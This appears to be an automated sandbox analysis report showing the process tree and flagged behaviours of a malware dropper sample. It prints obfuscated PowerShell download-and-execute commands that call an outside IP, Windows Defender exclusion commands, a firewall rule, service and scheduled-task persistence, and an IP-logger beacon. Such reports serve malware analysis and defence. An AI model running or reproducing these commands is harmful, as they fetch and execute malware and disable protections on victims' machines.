8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Install_Files.exe PID 2256 wrote to memory of 4784 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe pub2.exe PID 2256 wrote to memory of 4784 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe pub2.exe PID 2256 wrote to memory of 4784 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe pub2.exe PID 2256 wrote to memory of 4704 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe jamesdirect.exe PID 2256 wrote to memory of 4704 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe jamesdirect.exe PID 2256 wrote to memory of 4704 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe jamesdirect.exe PID 2256 wrote to memory of 4312 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Litever01.exe PID 2256 wrote to memory of 4312 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Litever01.exe PID 2256 wrote to memory of 4312 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Litever01.exe PID 2256 wrote to memory of 1440 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Complete.exe PID 2256 wrote to memory of 1440 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Complete.exe PID 2256 wrote to memory of 1440 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Complete.exe PID 2256 wrote to memory of 1756 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe md9_1sjm.exe PID 2256 wrote to memory of 1756 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe md9_1sjm.exe PID 2256 wrote to memory of 1756 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe md9_1sjm.exe PID 4600 wrote to memory of 4072 4600 Folder.exe msedge.exe PID 4600 wrote to memory of 4072 4600 Folder.exe msedge.exe PID 4600 wrote to memory of 4072 4600 Folder.exe msedge.exe PID 388 wrote to memory of 4868 388 Install.exe cmd.exe PID 388 wrote to memory of 4868 388 Install.exe cmd.exe PID 388 wrote to memory of 4868 388 Install.exe cmd.exe PID 3380 wrote to memory of 4980 3380 Files.exe jfiag3g_gg.exe PID 3380 wrote to memory of 4980 3380 Files.exe jfiag3g_gg.exe PID 3380 wrote to memory of 4980 3380 Files.exe jfiag3g_gg.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 684 3696 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe"C:\Users\Admin\AppData\Local\Temp\8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij72⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf89e46f8,0x7ffbf89e4708,0x7ffbf89e47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5016 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:13⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x258,0x25c,0x260,0x234,0x264,0x7ff602625460,0x7ff602625470,0x7ff6026254804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1264 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6296 /prefetch:23⤵
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a3⤵
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
-
C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\8xQttYQw__jO6jcZPLtfAve5.exe"C:\Users\Admin\Documents\8xQttYQw__jO6jcZPLtfAve5.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif4⤵
-
C:\Windows\SysWOW64\cmd.execmd5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"6⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"6⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"6⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\OsRbtAhgMZlouovOA63p_7CS.exe"C:\Users\Admin\Documents\OsRbtAhgMZlouovOA63p_7CS.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\34a5e036-8ebc-4164-b01e-fc5333118faa.exe"C:\Users\Admin\AppData\Local\Temp\34a5e036-8ebc-4164-b01e-fc5333118faa.exe"4⤵
-
C:\Users\Admin\Documents\3LYRJa_h21qcP23mkEqZVhGK.exe"C:\Users\Admin\Documents\3LYRJa_h21qcP23mkEqZVhGK.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 6164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 6364⤵
- Program crash
-
C:\Users\Admin\Documents\eoUnH76y_45c6j6dcX8_bGA7.exe"C:\Users\Admin\Documents\eoUnH76y_45c6j6dcX8_bGA7.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS49D3.tmp\Install.exe.\Install.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS7529.tmp\Install.exe.\Install.exe /S /site_id "525403"5⤵
-
C:\Users\Admin\Documents\QbzwuFXxEJB1z9zPyT5N7oVX.exe"C:\Users\Admin\Documents\QbzwuFXxEJB1z9zPyT5N7oVX.exe"3⤵
-
C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe"C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe" -Force4⤵
-
C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe"C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 14205⤵
- Program crash
-
C:\Users\Admin\Documents\bNDiBhKxC6KPXgLxJ0eAvuwe.exe"C:\Users\Admin\Documents\bNDiBhKxC6KPXgLxJ0eAvuwe.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\pxsqodyn.exe" C:\Windows\SysWOW64\snwpteqq\4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config snwpteqq binPath= "C:\Windows\SysWOW64\snwpteqq\pxsqodyn.exe /d\"C:\Users\Admin\Documents\bNDiBhKxC6KPXgLxJ0eAvuwe.exe\""4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start snwpteqq4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4745.bat" "4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 12724⤵
- Program crash
-
C:\Users\Admin\Documents\kv93OZJK9SMSrQ5lj2ktTVeO.exe"C:\Users\Admin\Documents\kv93OZJK9SMSrQ5lj2ktTVeO.exe"3⤵
-
C:\Users\Admin\Documents\s7PsoPAUXK8A7maG9KixPMeB.exe"C:\Users\Admin\Documents\s7PsoPAUXK8A7maG9KixPMeB.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"4⤵
-
C:\Windows\system32\mode.commode 65,105⤵
-
C:\Users\Admin\Documents\BKq0ajiZJzEbtqBPqp6wgyDQ.exe"C:\Users\Admin\Documents\BKq0ajiZJzEbtqBPqp6wgyDQ.exe"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
-
C:\Windows\SysWOW64\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "7316" "2120" "2160" "2212" "0" "0" "2216" "0" "0" "0" "0" "0"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
-
C:\Users\Admin\Documents\onGvjMU2m141G5PV7GmGrEm_.exe"C:\Users\Admin\Documents\onGvjMU2m141G5PV7GmGrEm_.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 4724⤵
- Program crash
-
C:\Users\Admin\Documents\QnI7RpUVX7ROr0hQDhUrsLCG.exe"C:\Users\Admin\Documents\QnI7RpUVX7ROr0hQDhUrsLCG.exe"3⤵
-
C:\Users\Admin\Documents\WjDle5eyOc3IUP8D91U974yX.exe"C:\Users\Admin\Documents\WjDle5eyOc3IUP8D91U974yX.exe"3⤵
-
C:\Users\Admin\Documents\tFapeliATlitnaPwSm6XyzKg.exe"C:\Users\Admin\Documents\tFapeliATlitnaPwSm6XyzKg.exe"3⤵
-
C:\Users\Admin\Documents\3TMzwVzv2jTxn7kvP1onmpZ_.exe"C:\Users\Admin\Documents\3TMzwVzv2jTxn7kvP1onmpZ_.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\X7PsIcqFEwOeJ8J1mHuG8tkH.exe"C:\Users\Admin\Documents\X7PsIcqFEwOeJ8J1mHuG8tkH.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\yEh1fHbg0KS9MoIqM_RZb1ql.exe"C:\Users\Admin\Pictures\Adobe Films\yEh1fHbg0KS9MoIqM_RZb1ql.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\1GZC719qoMDYIcm4jeh_X6ZB.exe"C:\Users\Admin\Pictures\Adobe Films\1GZC719qoMDYIcm4jeh_X6ZB.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\oIFkiwq3aVOYs7QIoaGhfkcL.exe"C:\Users\Admin\Pictures\Adobe Films\oIFkiwq3aVOYs7QIoaGhfkcL.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\__2y_sbBF_l0QMkjWV41ogTS.exe"C:\Users\Admin\Pictures\Adobe Films\__2y_sbBF_l0QMkjWV41ogTS.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\MUyura5UTrq9ndaOYIIYsVtE.exe"C:\Users\Admin\Pictures\Adobe Films\MUyura5UTrq9ndaOYIIYsVtE.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\8toxyvMY5eftDXbfHZ5Nkspi.exe"C:\Users\Admin\Pictures\Adobe Films\8toxyvMY5eftDXbfHZ5Nkspi.exe"5⤵
-
C:\Users\Admin\Documents\qwLZbRWI5olGVoLz1AeO9sBt.exe"C:\Users\Admin\Documents\qwLZbRWI5olGVoLz1AeO9sBt.exe"3⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#614⤵
-
C:\Users\Admin\Documents\8tlxMPYDw6gtZ278TNDrgSFv.exe"C:\Users\Admin\Documents\8tlxMPYDw6gtZ278TNDrgSFv.exe"3⤵
-
C:\Users\Admin\Documents\hvjoV9uoVBrkQ52viZaB6CDF.exe"C:\Users\Admin\Documents\hvjoV9uoVBrkQ52viZaB6CDF.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 4844⤵
- Program crash
-
C:\Users\Admin\Documents\qwVE9lVPJ5BFPzZyglrA04yI.exe"C:\Users\Admin\Documents\qwVE9lVPJ5BFPzZyglrA04yI.exe"3⤵
-
C:\Users\Admin\Documents\qwVE9lVPJ5BFPzZyglrA04yI.exe"C:\Users\Admin\Documents\qwVE9lVPJ5BFPzZyglrA04yI.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7668 -s 5645⤵
- Program crash
-
C:\Users\Admin\Documents\eCZwUXcf2v4T9aCxpNBSxNEf.exe"C:\Users\Admin\Documents\eCZwUXcf2v4T9aCxpNBSxNEf.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exeC:\Users\Admin\AppData\Local\Temp\jamesdirect.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exeC:\Users\Admin\AppData\Local\Temp\jamesdirect.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 4924⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Litever01.exe"C:\Users\Admin\AppData\Local\Temp\Litever01.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\Complete.exe"C:\Users\Admin\AppData\Local\Temp\Complete.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\Zh8HfuR0H99IFab95QhRkd_A.exe"C:\Users\Admin\Documents\Zh8HfuR0H99IFab95QhRkd_A.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 4684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 5124⤵
- Program crash
-
C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe"C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe" -Force4⤵
-
C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe"C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe"4⤵
-
C:\Users\Admin\Documents\7E4KGS5KRYdTYM9UbhbVCkXW.exe"C:\Users\Admin\Documents\7E4KGS5KRYdTYM9UbhbVCkXW.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
